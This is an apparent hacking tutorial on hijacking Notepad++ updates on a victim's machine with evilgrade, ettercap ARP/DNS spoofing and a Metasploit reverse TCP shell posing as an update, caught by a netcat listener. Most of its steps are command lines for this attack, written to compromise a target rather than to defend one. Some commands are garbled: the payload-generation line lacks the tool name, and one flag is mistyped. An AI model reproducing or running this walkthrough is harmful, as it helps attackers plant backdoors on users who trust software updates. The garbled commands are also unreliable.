Hijack Software Updates to Install a Rootkit for Backdoor Access

There are innumerable ways to hack a system. We must not overlook any of the possibilities if we want to "own" the system. As systems become more and more secure, we need to be vigilant in our search for weaknesses. In this hack, we'll look at abusing the trust that a user innately has for software updates to install our own listener/rootkit on their system.

Exploiting "Trustworthy" Software Updates

All of us have seen that message—software updates are available now! Invariably, we trust this message and download the update to presumably make our system work better, add a new feature, or make our system safer.
What if, instead, when we're prompted to download that update, we are installing malicious software on our system that would give a malicious hacker control of our system? That's what we are going to do to our victim here!
Unlike many of our hacks, this one is independent of just about any other factors such as operating system, ports, etc. Here we will be abusing trust, not an operating system or application.
This will be one of the most complex hacks we've ever done on Null Byte, so if you're new to hacking, you may want to come back after doing bit of background work. This hack also leverages what we did in an earlier tutorial using a MitM attack, so you may want to read that one first.

Step 1: Install NotePad++

In this hack, we will be using Notepad++ as our example software that we will hijack its update, so you will need to install it on one system. In my example, I have downloaded it to a Windows 7 system.

You can download the newest version of Notepad++ on their website.

Step 2: Download & Install EvilGrade

Next, we will install Infobytesec's evilgrade, which was designed to be a modular framework that allows the attacker to take advantage of poor upgrade implementations by injecting "evil" updates to an unaware user. We can download evilgrade from GitHub.
Now make directory called evilgrade.

• mkdir -p /root/evilgrade

Now change to that directory.

• cd /root/evilgrade

Next we extract and install evilgrade.

• tar -xvf isr-evilgrade-2.0.0.tar.gz

Step 3: Run Evilgrade

Next we need to run evilgrade. We type:

• ./evilgrade

This puts evilgrade into interactive mode where we now use it from its own prompt:

• evilgrade>

Step 4: List Modules

Now that evilgrade is running, let's take a look at the modules that evilgrade has built in. Here, the modules represent software that evilgrade is designed to hijack its updates/upgrade process. In this hack, of course, we will be hijacking the upgrade of Notepad++.
As you can see below, evilgrade has modules for many other pieces of software, but it's far from covering all software updates/upgrades.

• show modules

The key is to find what apps the victim is using that are also on evilgrade's list of modules and target that application.

Step 5: Configure Notepad

Next, we need to tell evilgrade what software we want to hijack its upgrade process. Let's tell evilgrade we want to hijack notepadplus.

• evilgrade>configure notepadplus

Step 6: See What Parameters the Notepad++ Module Requires

Our next step is to see what parameters the evilgrade notepadplus module requires to function. We check this with a command similar to Metasploit by typing:

• show options

As we can see in the screenshot above, this module requires that we point it to the source of the Notepad++ software and updates, namely sourceforge.net. In addition, we need to set the agent which will be the malicious payload we want to install on the victim in place of the expected update.

Step 7: Generate a Payload with Metsploit

Now that we have evilgrade setup and configured, we need to develop a malicious payload to deliver to the upgrading software instead of the actual upgrade. We can do this with Metasploit.
If you have followed my other tutorials on Metasploit, you know that we can choose a number of different payloads using Metasploit (a payload is what we load on to victim system to give us control). In this case, we will be using one of the most basic payloads, the reverse tcp shell.
We can generate a payload without opening Metasploit with the following command. This command takes an exploit from the Metasploit framework and loads it to a file called notepadplus_update.exe.

• /pentest/exploits/framework/modules/payloads/windows shell_reverse_tcp LHOST 192.168.1.104 > /root/evilgrade/notepadplus_update.exe

Note, that if you are using a different version of BackTrack or Kali, these payload modules may be in a different directory.

Step 8: Start Evilgrade

Next, we have to start the evilgrade server. This is done with a simple start command.

• evilgrade>start

Step 9: Add Notepad++ Update Server as the Domain to Steal

Our next step is to add Notepad++ to the domain we want to hijack. We can do this by adding an entry to ettercap's etter.dns spoofing module. This enables us to spoof the domain name of the update source for the victim software.
Since Notepad++ is hosted by sourceforge, we add the following line to the end of the etter.dns file.

• notepad-plus.sourceforge.net A 192.168.1.104

Of course, the IP address you should use is the IP address that you want the update process to look to for your evil update.

Step 10: Configure Iptables

Iptables are the Linux/Unix built-in firewall/router. We can use this feature to route the traffic through our system in a MitM attack. Let's open the etter.conf file in your favorite text editor.

• kwrite /etc/etter.conf

As you see when you scroll down about two-thirds of the way through the file, there's an entry that I have highlighted on iptables. Simply uncomment (remove the #) to the second and third lines to enable using iptables.

Step 11: Start Ettercap

We can now start ettercap with the following command.

• ettercap -Tqi eth0 -P dns_spoof -M arp 192.168.1.114 192.168.1.104

Where:

• --T designates the Terminal interface
• -q says use quiet mode
• -i eth0 says we want to use eth0 as our interface
• -P dns_spoof designates that we want to use the dnsspoof plug in_
• -M arp says we want to use a MitM attack with arp on between the two IP addresses_

Step 12: Start Netcat Listener

Now we need to start the netcat listener from our attack machine. We need to listen on the port defined by the evilgrade app, in this case, 1234 for Notepad++.

• nc -l -p 1234

Step 13: Open Notepad++

Now, let's open Notepad++ from our Windows victim machine.

Step 14: Verify the DNS Spoof

If the update doesn't fire as soon as you open Notepad++, we need to check the DNS spoof.
Evilgrade is a powerful tool for hijacking software updates. By playing a Man-in-the-Middle attack, we can attack just about any operating system with the updating software. The only limitation we have here are the modules that evilgrade is designed to hijack its update.